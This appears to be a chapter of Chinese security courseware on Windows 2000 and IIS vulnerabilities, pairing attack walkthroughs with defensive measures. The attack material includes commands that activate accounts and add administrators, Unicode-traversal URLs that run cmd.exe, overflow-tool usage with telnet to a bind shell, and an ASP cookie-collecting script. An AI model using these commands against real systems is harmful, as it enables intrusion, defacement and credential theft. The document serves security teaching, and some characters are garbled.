針對(duì)輸入法漏洞的攻擊有本地和遠(yuǎn)程兩種攻擊方式，該種攻擊方式可以使本地用戶繞過(guò)身份驗(yàn)證機(jī)制進(jìn)入系統(tǒng)內(nèi)部。 （1）啟動(dòng)機(jī)器進(jìn)入 Windows 2000登錄界面，此時(shí)將光標(biāo)放至“用戶名”文本框中，見(jiàn)下圖。攻擊實(shí)現(xiàn)（2）然后按Ctrl+shift快捷鍵調(diào)出全拼輸入法狀態(tài)攻擊實(shí)現(xiàn)（5）打開(kāi)“輸入法操作指南”窗口，在基本操作目錄下選擇一項(xiàng)幫助目錄后，單擊鼠標(biāo)右鍵，從彈出的快捷菜單中選擇“跳至URL”命令，見(jiàn)下圖。攻擊實(shí)現(xiàn)（6）在“跳至URL”的 “跳至該URL”中輸入“e:\”，單擊“確定”按鈕，見(jiàn)下圖。攻擊實(shí)現(xiàn)（7）此時(shí)可以列出E盤(pán)中的文件夾，見(jiàn)下圖　攻擊實(shí)現(xiàn) 在C:\下，拖拽任意文件，點(diǎn)右鍵，選擇創(chuàng)建一個(gè)快捷方式，右鍵點(diǎn)擊該快捷方式，在“屬性”->“目標(biāo)”->c:\winnt\system32\net．exe后面空一格，填入“user guest/active:yes”點(diǎn)“確定”。這一步驟目的在于用net．exe激活被禁止使用的guest賬戶，當(dāng)然也可以填入“user用戶名 密碼/add”，創(chuàng)建一個(gè)新賬號(hào)。 雙擊運(yùn)行該快捷方式，此時(shí)并不會(huì)看到運(yùn)行狀態(tài)，但guest用戶已被激活。同樣方法可以將 guest通過(guò)“localgroup administrators guest/add”加入管理員組變成系統(tǒng)管理員。 遠(yuǎn)程攻擊 Windows 2000中文簡(jiǎn)體版的終端服務(wù)，在遠(yuǎn)程操作時(shí)仍然存在這一漏洞，而且危害更大。Windows 2000的終端服務(wù)功能，能使系統(tǒng)管理員對(duì)Windows 2000進(jìn)行遠(yuǎn)程操作，采用的是圖形界面，能使用戶在遠(yuǎn)程控制計(jì)算機(jī)時(shí)與在本地使用一樣，其默認(rèn)端口為3389，用戶只要裝了 Windows 2000的客戶端連接管理器就能與開(kāi)啟了該服務(wù)的計(jì)算機(jī)相聯(lián)。因此，這一漏洞使終端服務(wù)成為 Windows 2000的合法木馬（SP2以前）。 黑客通過(guò)端口掃描工具，如流光、網(wǎng)絡(luò)刺客等，搜索某一網(wǎng)段，尋找開(kāi)放3389端口的機(jī)器，如是中文簡(jiǎn)體版Windows 2000系統(tǒng)并且沒(méi)有打SP2補(bǔ)丁，記錄其IP地址，通過(guò)遠(yuǎn)程登陸工具（如酷虎Win2K登錄器），即可進(jìn)入登陸界面，其方法如本地攻擊。 攻擊防范 采取以下一些預(yù)防措施，可以有效杜絕黑客的攻擊: （1）給Windows 2000 打補(bǔ)丁到 SP4（如打補(bǔ)丁到 SP4）不需要進(jìn)行第 2項(xiàng)操作）。 （2）刪除輸入法幫助文件和多余的輸入法。 為了防止惡意用戶通過(guò)輸入法漏洞對(duì)服務(wù)器進(jìn)行攻擊，刪除不需要的輸入法和輸入法的幫助文件。這些幫助文件通常在 Windows 2000的安裝目錄下（如:C:Windowsnt）的 Help目錄下，對(duì)應(yīng)的幫助文件分別是: Windowsime.chm 輸入法操作指南； Windowssp.chm 雙拼輸入法幫助； Windowszm.chm 鄭碼輸入法幫助。攻擊防范 （3）防止別人惡意利用net.exe，可以考慮將其移出c:\winnt\system32目錄，或者改名。但自己應(yīng)記住更改的目錄或新的文件名。 3.4.2 IPC＄攻擊 漏洞描述 IPC$(Internet Process Connection）是共享“命名管道”的資源，它是為了讓進(jìn)程間通信而開(kāi)放的命名管道，通過(guò)提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換，從而實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問(wèn)。 IPC＄是Windows NT/2000的一項(xiàng)新功能，它有一個(gè)特點(diǎn)，即在同一時(shí)間內(nèi)，兩個(gè) IP之間只允許建立一個(gè)連接。Windows NT/2000在提供了 IPC＄功能的同時(shí)，在初次安裝系統(tǒng)時(shí)還打開(kāi)了默認(rèn)共享，即所有的邏輯共享（c＄，d＄，e＄……）和系統(tǒng)目錄winnt或windows（admin＄）共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無(wú)意中，導(dǎo)致了系統(tǒng) 安全性的降低。 漏洞描述 IPC＄漏洞，其實(shí)IPC＄本身并不是一個(gè)真正意義上的漏洞，其主要漏洞在于其允許空會(huì)話（Null session）�？諘�(huì)話是在沒(méi)有信任的情況下與服務(wù)器建立的會(huì)話（即未提供用戶名與 密碼）。 那么，通過(guò)空會(huì)話，黑客可以做什么？ 對(duì)于Windows NT系列的操作系統(tǒng)，在默認(rèn)安全設(shè)置下，借助空連接可以列舉目標(biāo)主機(jī)上的用戶和共享，訪問(wèn)everyone權(quán)限的共享，訪問(wèn)小部分注冊(cè)表等，但這對(duì)黑客來(lái)說(shuō)并沒(méi)有什么太大的利用價(jià)值；對(duì) windows2000作用更小，因?yàn)樵?Windows 2000和以后版本中默認(rèn)只有管理員和備份操作員有權(quán)從網(wǎng)絡(luò)訪問(wèn)到注冊(cè)表，而且實(shí)現(xiàn)起來(lái)也不方便，需借助工具。 漏洞描述 單從上述描述來(lái)看，空會(huì)話好像并無(wú)名大用處，但從一次完整的IPC＄入侵來(lái)看，空會(huì)話是一個(gè)不可缺少的跳板，以下是空會(huì)話中能夠使用的一些具體命令: （1）首先，建立一個(gè)空會(huì)話（當(dāng)然，這需要目標(biāo)開(kāi)放IPC＄）。命令如下: net use\\ip\ipc＄""/user:"" 注意:上面的命令包括四個(gè)空格，net與 use中間有一個(gè)空格，use后面一個(gè)，密碼左右各一個(gè)空格。 （2）空會(huì)話建立之后，可以進(jìn)行查看遠(yuǎn)程主機(jī)的共享資源。命令如下: net view \\ip 漏洞描述解釋:前提是建立空連接后，用此命令則以置看遠(yuǎn)程主機(jī)的共享資源，如果它開(kāi)啟了共享，可以得到如下的結(jié)果，但此命令不能顯示默認(rèn)共享。 在 \\*.*.*.* 的共享資源: 資源共享名 類型 用途 注釋 （3）查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間。命令如下: net time\\ip 解釋: 用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間。 漏洞描述 （4）得到遠(yuǎn)程主機(jī)的NetBIOS用戶名列表（需要打開(kāi)自己的NBT）。命令如下: netstat －A ip 解釋:用此命令可以得到一個(gè)遠(yuǎn)程主機(jī)的NetBIOS用戶名列表。 通過(guò)IPC＄空連接，可以借助第三方工具對(duì)遠(yuǎn)程主機(jī)的管理賬戶和弱口令進(jìn)行枚舉。一旦猜測(cè)到弱口令，可進(jìn)一步完成入侵，并植入后門。 防范IPC＄入侵 (1) 禁止空連接進(jìn)行枚舉（此操作并不能阻止空連接的建立）。首先運(yùn)行regedit，找到如下組鍵: ［HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] 將RestrictAnonymous＝DWORD的鍵值改為:00000001（如果設(shè)置為2的話，有一些問(wèn)題會(huì)發(fā)生，比如一些Windows的服務(wù)出現(xiàn)問(wèn)題等）。（2）禁止默認(rèn)共享。 ①察看本地共享資源。在開(kāi)始/程序/運(yùn)行命令行中輸入“cmd”進(jìn)入 MS－DOS模式，再輸入“net share"。 ②刪除共享（每次輸入一個(gè)）。 net share lpc＄/delete net share admini$/delete net share c＄/delete net share d＄/delete（如果有 e，f，……可以繼續(xù)刪除） ③停止server服務(wù)。 net stop server /y（重新啟動(dòng)后 server服務(wù)會(huì)重新開(kāi)啟）（2）禁止默認(rèn)共享。 ④修改注冊(cè)表。運(yùn)行regedit。對(duì)于server版:找到主鍵:［HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\ Servlces\Lanmanserver\Parameters］把AutoShareServer（DWORD）的鍵值改為:00000000。對(duì)于pro 版:找到主鍵:［HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\ Servlces\Lanmanserver\Parameters］把 Autosharewks（DWORD）的鍵值改為:00000000。如果上面所說(shuō)的主鍵不存在，就新建（右擊新建/雙字節(jié)值）一個(gè)主鍵再改鍵值。（2）禁止默認(rèn)共享。 ⑤永久關(guān)閉 IPC＄和默認(rèn)共享依賴的服務(wù):lanmanserver即 server服務(wù)。操作方法為:控制面板/管理工具/服務(wù)中找到server服務(wù)（右擊）/屬性/常規(guī)/啟動(dòng)類型/已禁用。 ⑥安裝防火墻（選中相關(guān)設(shè)置），或者通過(guò)本地連接TCP/IP篩選進(jìn)行端口過(guò)濾（濾掉139，445等）。 ⑦設(shè)置復(fù)雜密碼，防止通過(guò)IPC＄窮舉密碼。 3.4.3 RPC （Remote Procedure Call）漏洞 遠(yuǎn)程過(guò)程調(diào)用（Remote Procedure Call，簡(jiǎn)稱 RPC）是一種協(xié)議，程序可使用這種協(xié)議向網(wǎng)絡(luò)中的另一臺(tái)計(jì)算機(jī)上的程序請(qǐng)求服務(wù)。由于使用RPC的程序不必了解支持通信的網(wǎng)絡(luò)協(xié)議的情況，因此，RPC提高了程序的互操作性。Microsoft的RPC部分在通過(guò)TCP/IP處理信息交換時(shí)存在問(wèn)題，遠(yuǎn)程攻擊者可以利用這個(gè)漏洞以本地系統(tǒng)權(quán)限在系統(tǒng)上執(zhí)行任意指令。 RPC漏洞是由于 Windows RPC服務(wù)在某些情況下不能正確檢查消息輸入而造成的。如果攻擊者在RPC建立連接后發(fā)送某種類型的格式不正確的RPC消息，則會(huì)導(dǎo)致遠(yuǎn)程計(jì)算機(jī)上與RPC之間的基礎(chǔ)分布式組件對(duì)象模型［分布式對(duì)象模型（DCOM）是一種能夠使軟件組件通過(guò)網(wǎng)絡(luò)直接進(jìn)行通信的協(xié)議。 3.4.3 RPC （Remote Procedure Call）漏洞 DCOM以前叫做“網(wǎng)絡(luò) OLE”，它能夠跨越包括Internet協(xié)議（例如 HTTP）在內(nèi)的多種網(wǎng)絡(luò)傳輸。接口出現(xiàn)問(wèn)題，進(jìn)而使任意代碼得以執(zhí)行。成功利用此漏洞可以根據(jù)本地系統(tǒng)權(quán)限執(zhí)行任意指令。攻擊者可以在系統(tǒng)上執(zhí)行任意操作，如安裝程序、查看或更改、刪除數(shù)據(jù)、修改網(wǎng)頁(yè)或建立系統(tǒng)管理員權(quán)限的賬戶甚至格式化硬盤(pán)。 沖擊波（Worm.Blaster）病毒就是利用RPC傳播，導(dǎo)致受影響的Windows XP/2000/2003系統(tǒng)彈出RPC服務(wù)終止對(duì)話框，系統(tǒng)總是無(wú)故反復(fù)自動(dòng)關(guān)機(jī)、重啟，給全球網(wǎng)絡(luò)造成重大損失，不少企業(yè)網(wǎng)絡(luò)因此一度癱瘓。此后又出現(xiàn)高波（Worm_Agobot）蠕蟲(chóng)病毒也是針對(duì)此漏洞進(jìn)行傳播，造成大范圍危害。 3.4.3 RPC （Remote Procedure Call）漏洞 黑客也會(huì)利用此漏洞進(jìn)行攻擊，通過(guò)Retina(R)就可以很容易掃描一個(gè)網(wǎng)段存在RPC漏洞隱患的機(jī)器。 3.4.3 RPC （Remote Procedure Call）漏洞利用一款叫cndcom的溢出工具，很容易使目標(biāo)產(chǎn)生溢出，獲得系統(tǒng)權(quán)限 3.5 針對(duì)IIS漏洞攻擊 Microsoft IIS是允許在公共Intranet或Internet上發(fā)布信息的Web服務(wù)器，IIS可以提供HTTP、FTP、gopher服務(wù)。 IIS本身的安全性能并不理想，漏洞層出不窮，如 MDAC弱點(diǎn)漏洞、ida＆idq漏洞、printer漏洞、Unicode編碼、目錄遍歷漏洞、WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞等，使得針對(duì)IIS服務(wù)器的攻擊事件頻頻發(fā)生。 3.5.1 Unicode漏洞 漏洞分析 Uicode為一個(gè)ISO國(guó)際標(biāo)準(zhǔn)，它包含了世界各國(guó)的常用文字，可支持?jǐn)?shù)百萬(wàn)個(gè)字碼。它的目的是統(tǒng)一世界各國(guó)的字符編碼。許多操作系統(tǒng)，最新的瀏覽器和其他產(chǎn)品都支持Unicode編碼。 IIS 4.0、IIS5.0在使用Unicode解碼時(shí)存在一個(gè)安全漏洞，導(dǎo)致用戶可以遠(yuǎn)程通過(guò)IIS 執(zhí)行任意命令。當(dāng)用戶用IIS打開(kāi)文件時(shí)，如果該文件名包含Unicode字符，系統(tǒng)會(huì)對(duì)其進(jìn)行解碼。如果用戶提供一些特殊的編碼請(qǐng)求，將導(dǎo)致IIS錯(cuò)誤地打開(kāi)或者執(zhí)行某些Web根目錄以外的文件。 通過(guò)此漏洞，攻擊者可查看文件內(nèi)容、建立文件夾、刪除文件、拷貝文件且改名、顯示目標(biāo)主機(jī)當(dāng)前的環(huán)境變量、把某個(gè)文件夾內(nèi)的全部文件一次性拷貝到另外的文件夾去、把某個(gè)文件夾移動(dòng)到指定的目錄和顯示某一路徑下相同文件類型的文件內(nèi)容等。 漏洞成因 Unicode漏洞影響的版本有:從中文Windows IIS 4.0＋SP6開(kāi)始，還影響中文Windows2000＋I(xiàn)IS5.0、中文Windows 2000＋I(xiàn)IS5.S+SP1。繁體中文版也同樣存在這樣的漏洞。它們利用擴(kuò)展Unicode字符（如利用“../”取代“/”和“\”）進(jìn)行目錄遍歷漏洞。“\”在WindowsNT中編碼為％c1％9c，在 Windows 2000英文版中編碼為％c0％af。漏洞攻擊 網(wǎng)絡(luò)中有很多入門級(jí)攻擊都是來(lái)源于Unicode漏洞。攻擊者要檢測(cè)網(wǎng)絡(luò)中某IP段的Unicode漏洞情況，可以使用Red.exe、Xscan、SuperScan、RangeScan掃描器、Unicode掃描程序 Uni2.pl及流光 Fluxay4.7和 SSS等掃描軟件來(lái)檢測(cè)漏洞主機(jī)。 對(duì)檢測(cè)到主機(jī) IP 地址為 * . * . * . * 的 Windows NT/2000 主機(jī)，在 IE 地址欄輸入 http://* .*.*.*/scripts/..％c1％1c../winn/system32/cmd.exe？/c+dir（其中％c1％1c為Windows 2000中文版漏洞編碼，在不同的操作系統(tǒng)中，您可使用不同的漏洞編碼），如漏洞存在，您還可以將 Dir換成 Set和 Mkdir等命令，甚至可以用 http://*.*.*.*/scripts/..％c0％af../winnt/system32/ cmd.exe？/c+echo+內(nèi)容+>d:\pup\wwwroot\index.php來(lái)修改網(wǎng)站首頁(yè) （通過(guò)Unicode漏洞顯示服務(wù)器系統(tǒng)目錄文件） 防御辦法 若系統(tǒng)存在Uuicode漏洞，可采取如下方法進(jìn)行補(bǔ)救: （1）限制網(wǎng)絡(luò)用戶訪問(wèn)和調(diào)用CMD命令的權(quán)限； （2）若沒(méi)必要使用SCRIPTS和MSADC目錄，將其全部刪除或改名； （3）安裝Windows NT系統(tǒng)時(shí)不要使用默認(rèn)winnt路徑，您可以改為其他的文件夾，如C:\mywindowsnt； （4）用戶可從Microsoft網(wǎng)站安裝補(bǔ)丁。 3.5.2 IDA＆IDQ緩沖區(qū)溢出漏洞漏洞危害及成因 作為安裝IIS過(guò)程的一部分，系統(tǒng)還會(huì)安裝幾個(gè)ISAPI擴(kuò)展.dlls，其中 idq.dll是Index Server的一個(gè)組件，對(duì)管理員腳本和Internet數(shù)據(jù)查詢提供支持。但是，idq.dll在一段處理URL輸入的代碼中存在一個(gè)未經(jīng)檢查的緩沖區(qū)，攻擊者利用此漏洞能導(dǎo)致受影響服務(wù)器產(chǎn)生緩沖區(qū)溢出，從而執(zhí)行自己提供的代碼。更為嚴(yán)重的是，idq.dll是以 System身份運(yùn)行的，攻擊者可以利用此漏洞取得系統(tǒng)管理員權(quán)限。 3.5.2 IDA＆IDQ緩沖區(qū)溢出漏洞攻擊實(shí)現(xiàn) 由于這一漏洞廣泛地被入侵者所利用，idq.dll緩沖區(qū)溢出漏洞不亞于Unicode漏洞，極大地危害著網(wǎng)絡(luò)的安全。 如同所有的漏洞入侵過(guò)程一樣，先使用各種通用的漏洞掃描工具掃描出漏洞機(jī)器。然后到網(wǎng)絡(luò)搜索針對(duì)該漏洞的利用工具，如各種針對(duì)溢出工具。 溢出工具有圖形界面的Snake IIS IDQ和命令行下的IIS idq或者Idq over等。入侵流程: （1）找到一臺(tái)存在IDQ漏洞的服務(wù)器，這里目標(biāo)服務(wù)器的IP為X.X.X.X。入侵流程 （2）運(yùn)行IIS IDQ程序，這里以在Windows下使用的IIS IDQ版本為例，向 X.X.X.x的 80端口發(fā)送shellcode，如下圖所示。 入侵流程 注意:在測(cè)試時(shí)應(yīng)注意X.X.X.x的服務(wù)器版本，同時(shí)要正確選擇操作系統(tǒng)類型，這里默認(rèn)的綁定命令是dir c:\即列出目標(biāo)計(jì)算機(jī)C盤(pán)目錄，入侵者根據(jù)需要可以更改所綁定的命令，圖中添加的是“cmd.exe /c net user rend 1234/add”，這樣就在目標(biāo)服務(wù)器上加了一個(gè)用戶trend，密碼為1234。我們可以通過(guò)類似方法將trend添加成為管理員。 （3）發(fā)送Shellcode成功后，IIS IDQ溢出工具將在x.x.x.x上開(kāi)啟一個(gè)813端口。打開(kāi)一個(gè) cmd窗，鍵入命令 C:>telnet x.x.x.x 813，順利登錄目標(biāo)服務(wù)器。 3.5.3 Pinter溢出漏洞入侵 漏洞成因及危害 Windows 2000 IIS5的打印ISAPI擴(kuò)展接口建立了.printer擴(kuò)展名到msw3prt.dll的映射關(guān)系，缺省情況下該映射存在。當(dāng)遠(yuǎn)程用戶提交對(duì).printer的URL請(qǐng)求時(shí)，IIS5調(diào)用msw3prt.dll解釋該請(qǐng)求。由于msw3prt.dll缺乏足夠的緩沖區(qū)邊界檢查，遠(yuǎn)程用戶可以提交一個(gè)精心構(gòu)造的針對(duì).printer的URL請(qǐng)求，其"Host:”域包含大約420字節(jié)的數(shù)據(jù)，此時(shí)在msw3prt.dll中發(fā)生典型的緩沖區(qū)溢出，潛在允許執(zhí)行任意代碼。溢出發(fā)生后，Web服務(wù)停止響應(yīng)，Win2K可以檢查到Web服務(wù)停止響應(yīng)，從而自動(dòng)重啟它，因此，系統(tǒng)管理員很難意識(shí)到發(fā)生過(guò)攻擊。 攻擊實(shí)現(xiàn)攻擊實(shí)現(xiàn) 由于.printer漏洞只有 IIS5.0（Windows 2000 Server）存在，所以入侵者通過(guò)此漏洞入侵計(jì)算機(jī)只會(huì)針對(duì)IIS5.0進(jìn)行。 入侵者找到一臺(tái)存在有.printer漏洞的IIS5.0服務(wù)器，搜索一個(gè)在Windows平臺(tái)上進(jìn)行的.printer溢出程序——iis5hack，將之拷貝到C盤(pán)根目錄。 在命令提示符下運(yùn)行iis5hack程序，如下圖所示。 圖中，＜Host＞:溢出的主機(jī)；＜HostPort＞:主機(jī)的端口；＜HostType＞:溢出主機(jī)的類型；＜ShellPort＞:溢出的端口。 攻擊實(shí)現(xiàn) 假設(shè)目標(biāo)機(jī)的IP地址為192.168.1.50，打開(kāi)命令提示符程序，在提示符下輸入以下命令格式: C:\ iis5hack 192.168.1.50 80 0 192.168.1.50為存有.printer溢出漏洞的主機(jī)IP，80是指主機(jī)的用來(lái)溢出的端口，0是指.printer溢出主機(jī)的類型為中文版SPO補(bǔ)丁。 如果.printer溢出成功的話，會(huì)出現(xiàn)提示內(nèi)容，如下圖所示。 .printer溢出成功后，iis5hack將會(huì)提示:Now you can telnet to 99 port，可以直接通過(guò) telnet登陸99端口進(jìn)行操作。 防范.print溢出漏洞措施:打補(bǔ)丁。 3.6 Web應(yīng)用漏洞 3.6.1 針對(duì)數(shù)據(jù)庫(kù)漏洞 MS SQL－SERVER空口令入侵 Mlcrosoft Sql Server是微軟的關(guān)系數(shù)據(jù)庫(kù)產(chǎn)品。所謂空口令入侵，實(shí)際上并不是一個(gè)漏洞，而是管理員配置上的疏忽。 在微軟的MS SQL-SERVER7.0以下的版本在默認(rèn)安裝時(shí)，其SA（System Administrator）賬戶口令為空，所開(kāi)端口為 1433，一個(gè)入侵者只需要使用一個(gè)MS SQL客戶端與SA口令為空的服務(wù)器連接就可以獲得System的權(quán)限。 攻擊者可以使用MS SQL客戶端或是第三方客戶端連接工具將空口令服務(wù)器的數(shù)據(jù)庫(kù)導(dǎo)出、增加管理員等操作，GUI的SqlExec.exe就是其中一款。 MS SQL－SERVER空口令入侵（1）通過(guò)漏洞掃描軟件如流光等找到一臺(tái) SQL服務(wù)器的 SA為口令的主機(jī)。（2）運(yùn)行SqlExec.exe，如下圖所示。 MS SQL－SERVER空口令入侵（3）在如下圖所示對(duì)話框的Host文本框中填入SA為空的IP地址。 （4）單擊 Connect按鈕，等待幾秒鐘后 SqlExec就能與遠(yuǎn)程 SQL服務(wù)端建立連接。（5）連接成功后就獲得了System權(quán)限。此時(shí)可以執(zhí)行系統(tǒng)指令，如更改。administrator的密碼等。 Access數(shù)據(jù)庫(kù)下載漏洞 Access數(shù)據(jù)操作靈活、轉(zhuǎn)移方便、運(yùn)行環(huán)境簡(jiǎn)單，對(duì)于小型網(wǎng)站的數(shù)據(jù)庫(kù)處理能力效果還不錯(cuò)，是很多小型網(wǎng)站建站優(yōu)先選擇。但缺點(diǎn)是:數(shù)據(jù)庫(kù)如果沒(méi)有經(jīng)過(guò)嚴(yán)格防護(hù)，很容易被攻擊者利用特殊手段進(jìn)行下載。 （1）隱患原因。很多中小企業(yè)網(wǎng)站沒(méi)有開(kāi)發(fā)能力，廣泛應(yīng)用網(wǎng)絡(luò)上的新聞發(fā)布系統(tǒng)、產(chǎn)品發(fā)布系統(tǒng)、論壇，以及整站系統(tǒng)的源代碼來(lái)修改成自己的網(wǎng)站，修改后又義沒(méi)有采取必要的安全措施，給攻擊者留下可乘之機(jī)。 ①攻擊者可以用特殊請(qǐng)求讓腳本解析出錯(cuò)，得到數(shù)據(jù)庫(kù)路 徑，直接下載數(shù)據(jù)庫(kù)。 Access數(shù)據(jù)庫(kù)下載漏洞 ②攻擊者也可以分析網(wǎng)站所使用的系統(tǒng)的當(dāng)前網(wǎng)頁(yè)源文件包含的信息（meta，Keywords等），或者是頁(yè)面、管理后臺(tái)的版權(quán)信息，甚至是程序顯示調(diào)用頁(yè)面名稱（如一個(gè)新聞系統(tǒng)的新聞?wù){(diào)用顯示頁(yè)面mofei.news.show.asp，利用搜索引擎搜索mofei新聞系統(tǒng)即有可能得到這個(gè)系統(tǒng)的原程序），通過(guò)關(guān)鍵字在網(wǎng)絡(luò)搜索，即可得到相應(yīng)的該系統(tǒng)初始代碼。通過(guò)分析源程序，很容易得到一些利用信息，如數(shù)據(jù)庫(kù)的目錄、文件名、管理后臺(tái)、上傳、提交漏洞等，為攻擊帶來(lái)便利，或者通過(guò)知道路徑直接下載數(shù)據(jù)庫(kù)。 Access數(shù)據(jù)庫(kù)下載漏洞 一旦知道數(shù)據(jù)庫(kù)在服務(wù)器中的存放路徑，沒(méi)有經(jīng)過(guò)嚴(yán)格配制的數(shù)據(jù)庫(kù)很容易被下載，被下載之后，可以輕松獲得管理員賬戶、用戶資料及網(wǎng)站其他信息等。同時(shí)通過(guò)分析這種 Web應(yīng)用系統(tǒng)的數(shù)據(jù)庫(kù)結(jié)構(gòu)、字段，也很容易被用來(lái)對(duì)同類Web應(yīng)用系統(tǒng)進(jìn)行注入攻擊提供輔助。 接下來(lái)分析黑客的攻擊思路過(guò)程，以便在維護(hù)服務(wù)器時(shí)注意: ①下圖是一個(gè)論壇的首頁(yè)，查看源文件（所列舉的www.huway.com非真實(shí)被攻擊機(jī)器）。 Access數(shù)據(jù)庫(kù)下載漏洞 Access數(shù)據(jù)庫(kù)下載漏洞 ②通過(guò)源文件，發(fā)現(xiàn)作者留下 標(biāo)簽里面包含了www.huway.com的信息（見(jiàn)下圖）。當(dāng)然也對(duì)以通過(guò)頁(yè)面的關(guān)鍵字到搜索引擎搜索，huway為這個(gè)留言系統(tǒng)的關(guān)鍵字，搜索“huway留言本下載”搜索到相關(guān)源程序包下載地址。 Access數(shù)據(jù)庫(kù)下載漏洞 ③攻擊者甚至注解通過(guò)作者留下的信息，登錄其網(wǎng)站，也可以下載到該留言板的源代碼（見(jiàn)下圖）。 Access數(shù)據(jù)庫(kù)下載漏洞 ④下載該系統(tǒng)的源程序包之后，對(duì)照網(wǎng)站目錄很快找出數(shù)據(jù)庫(kù)存放路徑/lyDB/leeboard.mdb，直接在IE地址欄輸入數(shù)據(jù)庫(kù)地址，數(shù)據(jù)庫(kù)被下載，見(jiàn)下圖。 Access數(shù)據(jù)庫(kù)下載漏洞 ⑤打開(kāi)數(shù)據(jù)庫(kù)，找出用戶注冊(cè)數(shù)據(jù)的表，如下圖，第一個(gè)maslyWWX的用戶即為管理員，其他用戶資料也一覽無(wú)余（測(cè)試內(nèi)容，非真實(shí)資料）。 Access數(shù)據(jù)庫(kù)下載漏洞 （6）攻擊者發(fā)現(xiàn)密碼字段是加密，如 5f5Cb5b9d033044C，事實(shí)上，大多數(shù)網(wǎng)站對(duì)一些關(guān)鍵宇段加密都采用MD5算法加密的。而網(wǎng)絡(luò)上針對(duì)MD5的破解軟件很多，縱然進(jìn)行加密也不能保證安全。 Access數(shù)據(jù)庫(kù)下載漏洞 第一:如 GH圖 Md5Crack就是針對(duì)MD5加密的破解軟件，如果密碼是純數(shù)字組織，且在8位以下，在短時(shí)間內(nèi)就會(huì)被破解。 第二:很多網(wǎng)站通過(guò)Cookie進(jìn)行用戶驗(yàn)證，Cookie中的密碼通過(guò)就為MD5加密過(guò)的密碼，如果將普通用戶賬戶和密碼更改為管理員的賬戶和密碼，可以直接獲得管理員操作權(quán)限。此外通過(guò)NC等工具將Cookie信息（包括加密的密碼密文）直接提交到服務(wù)器，也有類管理員的權(quán)限。 （2）漏洞防范。 ①更改數(shù)據(jù)庫(kù)名。這是常用的方法，將數(shù)據(jù)庫(kù)名改成足夠復(fù)雜的文件防他人猜測(cè)。這樣，被猜到數(shù)據(jù)庫(kù)名則還能下載該數(shù)據(jù)庫(kù)文件，其幾率不大。 Access數(shù)據(jù)庫(kù)下載漏洞 ②更改數(shù)據(jù)庫(kù)里面常用宇段成復(fù)雜字段，避免注入（實(shí)施難度較大）。 ③給數(shù)據(jù)庫(kù)關(guān)鍵字段加密，對(duì)于管理員賬戶設(shè)置復(fù)雜密碼。 ④在你的數(shù)據(jù)庫(kù)文件文件中建一個(gè)表，表中取一個(gè)字段名叫:antihack，在表名建一個(gè)字段。字段中填入任意一段不能正確執(zhí)行的ASP語(yǔ)句，如＜％＝'a'-1％＞，再把數(shù)據(jù)庫(kù)改名為.Asp，因?yàn)檫@樣把擴(kuò)展名改成.ASP后在IE中輸入地址的時(shí)候，IE就會(huì)去解釋之間的代碼并且會(huì)出錯(cuò)，所以數(shù)據(jù)庫(kù)不會(huì)正確地被下載。如果在數(shù)據(jù)庫(kù)文件名前加一“＃“，雖然不能有效防止下載，但對(duì)防范注入攻擊（后面章節(jié)會(huì)提到）也有一定的效果。 Access數(shù)據(jù)庫(kù)下載漏洞 (建一個(gè)字段：antihack) Access數(shù)據(jù)庫(kù)下載漏洞 ⑤如果您有機(jī)器管理權(quán)限（非虛擬主機(jī)），以下方法也可有助幫您實(shí)現(xiàn)防止數(shù)據(jù)庫(kù)下載。 將您的數(shù)據(jù)庫(kù)放到 IIS以外的目錄，如 Web目錄在 D:\Web，可以將數(shù)據(jù)庫(kù)放到 E:\huway�；蛘邔�數(shù)據(jù)庫(kù)設(shè)置成不可讀取也是防止數(shù)據(jù)庫(kù)被下載的不錯(cuò)方法，在IIS中，數(shù)據(jù)庫(kù)上右鍵屬性中，設(shè)置文件不可以讀取。 3.6.2 Cookie攻擊 Cookie或稱Cookies，指某些網(wǎng)站為了辨別用戶身份而儲(chǔ)存在用戶本地終端上的數(shù)據(jù)（通常經(jīng)過(guò)加密）。 3.6.2 Cookie攻擊 如上圖，dking用戶在登陸時(shí)，系統(tǒng)就保留了該用戶的Cookie信息。當(dāng)我們點(diǎn)擊進(jìn)入會(huì)員專區(qū)的時(shí)候，事實(shí)客戶端向服務(wù)器提交了本地Cookie信息，包括用戶名、密碼等。（phpbb2mysql_data＝a％3A1％3A％7Bs％3A6％3A％22userid％22％3Bi％3A2％3B％7D；symfony＝ba7..） 3.6.2 Cookie攻擊 有些網(wǎng)站存放用戶名和密碼的Cookie是明文的，黑客只要讀取Cookie文件就可以得到賬戶和密碼，有些Cookie是通過(guò)Md5加密的，用戶仍然可以通過(guò)破解得到關(guān)鍵信息。 一些論壇用Cookie里面寫(xiě)入一鍵值來(lái)判斷用戶是否是管理員權(quán)限，例如某鍵值1為管理員，0為普通賬戶。這樣普通用戶通過(guò)Cookie修改鍵值，就可以直接獲得管理員權(quán)限。 通過(guò)IECookiesView的工具可以很方便的讀取本機(jī)上所有Cookie并可輕易修改之。 3.6.2 Cookie攻擊 而本地Cookie又是可以通過(guò)多種辦法被黑客遠(yuǎn)程讀取，例如你在某論壇看一個(gè)主題貼或 者打開(kāi)某個(gè)網(wǎng)頁(yè)時(shí)，您的本地Cookie就有可能被遠(yuǎn)程黑客所提取，所以Cookie很容易泄露 您的個(gè)人安全和隱私。 3.6.2 Cookie攻擊 用戶可將以下一段代碼保存為cookie.asp，然后上傳到您支持ASP、開(kāi)放FSO的主機(jī)空間，其地址為http://xxx.xxx.xxx.xxx/cookie.asp，從而了解黑客是如何讀取您的cookie的。 ＜％ testfile＝Server.MapPath（"cookies.txt"） msg＝Request（"msg"） Set fs＝server.CreateObject（"scripting.filesystemobject"） set thisfile=fs.OpenTextFile（testfle，8，True，t） thisfile.WriteLine（""&msg&""） thisfile.close set fs=nothing ％＞ 3.6.2 Cookie攻擊 